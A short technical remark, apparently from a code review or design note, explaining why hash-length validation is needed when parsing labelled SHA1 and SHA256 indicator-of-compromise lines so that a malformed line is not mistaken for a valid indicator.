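Length validation matters more than it looks: a label-only split would read "SHA1" off the front of a SHA256 line whose digest happens to start with a digit, and a malformed line would silently become a bad IOC.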